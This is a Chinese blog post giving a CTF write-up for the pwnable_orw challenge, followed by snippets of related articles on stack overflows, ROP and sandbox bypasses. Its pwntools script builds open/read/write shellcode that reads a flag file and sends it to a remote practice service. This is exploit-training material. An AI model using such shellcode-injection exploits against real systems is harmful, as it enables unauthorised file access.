shellcraft新姿势

最新推荐文章于 2025-03-29 15:54:59 发布
原创 最新推荐文章于 2025-03-29 15:54:59 发布 · 1.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c语言 #python

本文介绍了如何在限制调用open、read和write函数的环境中,利用pwntools的shellcraft模块构造shellcode,以读取并打印出flag文件的内容。通过学习这个例子,读者可以掌握更多关于shellcode编写技巧和pwntools库的使用。

pwnable_orw
exp 脚本
这道题的难度在于只能调用 open read 和 write ,学到了 shellcraft 新的使用方式
from pwn import *
io = remote(‘node3.buuoj.cn’,25539)
context.binary = ‘orw’
elf = ELF(‘orw’)
shellcode = shellcraft.open(’/flag’)
shellcode += shellcraft.read(‘eax’,‘esp’,100)
shellcode += shellcraft.write(1,‘esp’,100)
shellcode = asm(shellcode)
sleep(0.2)
io.sendline(shellcode)
io.interactive()

这三个函数在pwntools的原型
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在调用open函数后文件描述符fd在rax里,rsp为栈指针寄存器,指向buf

linux 栈溢出
sky123博客
02-01 4456
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
linux上的shellcode写法(pwntools,手写shell)
逆向萌新的博客
07-16 3962
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
ShellCraft
12-19
一款mac下的SSH客户端。界面清爽,支持多种样式。不需要过多冗余功能的很好选择
shell craft
12-03
首先这是一款xshell mac版本的替代版,使用方法和xshell基本一致。下载下来后,要注意!!!!一般会提示打不开(介意请勿下载),因为mac你设置的原因,自行百度解决方法。下载次数100+。我们都用着很好,打不开那没办法,我只提供工具,为了大家,就别举报了,举报了,我还要重上传,多麻烦?
shellcraft
05-29
mac 下ssh的工具,好用界面清爽简洁,解压后直接安装即可使用,缺点就是传输文件不是那么方便,看需使用
ShellCraft for Mac安装教程.docx
07-23
### ShellCraft for Mac安装与使用教程 #### 一、ShellCraft for Mac简介 ShellCraft for Mac是一款优秀的SSH/Telnet客户端软件,适用于Mac操作系统。该软件主要针对那些需要进行服务器管理和与Linux系统交互的...
pwntools的基本用法
weixin_44222568的博客
09-15 4518
一、实验名称 pwntools的基本用法 二、实验目的和要求 1.掌握pwntools的基本使用方法 2.掌握如何编写exploit 三、实验内容 1.Process 2.Attach 3.Shellcraft 四、实验环境(软、硬件环境,主要仪器设备) Linux操作系统,pwntools 五、实验数据记录 1.交互 本地:sh=process("./2.dms") 远程:sh=remote(“127.0.0.1”,10001) (1)127.0.0.1表示本地测验,实际题目容器会给定IP地址和端口,连接
pwntools各使用模块简介
weixin_34259232的博客
09-12 983
pwntools pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,并且里面包含多个模块,使利用变得简单。可以在github上直接搜索pwntools 进行安装。 基本模块 asm : 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有的主流平台dynelf : 用于远程符号泄漏,需要提供leak方法el...
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 2480
pwn沙箱
ROP的基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 3741
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
PWN-02
2301_79215333的博客
02-03 899
ret2syscall 原理 顾名思义,ret to syscall,就是调用系统函数以达到getshell的目的 在计算中,系统调用是一种编程方式,计算机程序从该程序中向执行其的操作系统内核请求服务。这可能包括与硬件相关的服务(例如,访问硬盘驱动器),创建和执行进程以及与诸如进程调度之类的集成内核服务进行通信。系统调用提供了进程与操作系统之间的基本接口。 至于系统调用在其中充当什么角色,稍后再看,现在我们要做的是:让程序调用execve(“/bin/sh”,NULL,NULL)函数即可拿到shell 相
第二周学习任务
wonder07的博客
11-10 577
1.学习ret2text,ret2syscall,ret2shellcoderet2text:是一种通过控制程序执行流执行程序本身已有的代码(.text段)的攻击方法我们手动码一个带栈溢出问题的程序,这个程序有两个子函数func和sys,func中gets位置存在栈溢出,而sys函数未被任何函数调用。gets(a);puts(a);func();
沙盒绕过:orw的两种利用方式
2302_79813730的博客
02-02 2614
接下来借一道例题来讲一下orw(open,read,write)的两种利用方式,open(打开)flag文件,将他read(读入)该有的位置,并(write)写出来,一般选取的都是bss段,但这里一般没有那么大的权限,就需要mprotect去该权限(前边已经讲过了,这个也是沙箱的基础),再利用orw。2直接进行计算,通过脚本可以知道,我们payload链读入到bss+0x28的位置,p64()打包为八个字节,中间有个*2要注意,再算上返回地址本身,一共是0x48,也就计算出来了。
BUUCTF [极客大挑战 2019]Not Bad
最新发布
2401_85052854的博客
03-29 531
我们直接open根目录下的flag,然后把flag的内容读入到mmap中,再用write打印处mmap的值,这里解释一下为什么fd为3,因为我们是打开文件进行读入,0,1,2分别是标准输出,标准输入,标准错误,所以3之后才是打开文件的顺序,所以我们写上3.以下是完整的exp。在main看到这两个比较有用的函数,第一个函数一眼看过去就发现是有沙箱保护的,第二个函数就是正常的栈溢出函数,我们先看看程序开了什么保护。也是第一次做到沙箱的题,也熟练了一点orw的攻击方式。拿到题目放入ida,看看有什么函数。
shellcode执行盒_简单shellcode学习
weixin_39887183的博客
12-06 400
引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。前置知识NX(堆栈不可执行)保护shellcode(一段16进制的数据,转化为字符串则为汇编代码)pwnable之start保护检测可以看到这道题目什么保护都没有开ida分析题目只有sta...
c沙箱与容器_orw技术分享
weixin_57140753的博客
11-24 1353
c沙箱与容器_orw技术分享
第三周pwn题
weixin_59339137的博客
12-04 472
pwn题
【pwn】[HGAME 2023 week1]simple_shellcode --orw利用攻击
question55的博客
11-11 343
先查看程序的保护状态可以看到,保护全开,拖进ida看主函数的逻辑可以看到有个mmap函数:mmap() 函数是Unix和类Unix操作系统中的一个系统调用,用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中,从而避免了频繁的文件 I/O 操作,提高了文件的读取效率。mmap() 函数的一般形式如下:c复制代码void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);参数说
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值